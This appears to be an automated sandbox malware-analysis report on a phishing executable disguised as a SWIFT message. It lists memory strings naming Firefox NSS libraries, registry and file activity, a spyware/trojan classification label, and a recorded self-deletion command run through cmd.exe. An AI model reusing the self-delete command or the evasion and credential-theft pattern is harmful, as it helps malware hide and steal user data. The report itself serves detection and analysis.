Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7962442056.0000000000178000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7977493803.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7978161221.000000001DD08000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987166435.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7990657320.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015896144.000000001E660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988349897.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020557418.000000001E704000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976764480.000000001DD10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019253907.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7985166767.000000001DD1C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973403016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7967762388.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020892239.000000001DA90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019860859.000000001E6E8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7986103075.000000001DD08000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970112067.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984865306.000000001DD28000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7965459586.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: Swift Mesaj#U0131#09971.exe

Virustotal: Detection: 10%

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

File read: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Jump to behavior

Source: Swift Mesaj#U0131#09971.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

1_2_00403373

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

File created: C:\Users\user\AppData\Local\Temp\nsrF4CB.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@8/55@2/2

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_004020FE CoCreateInstance,

1_2_004020FE

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_004046E6

Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
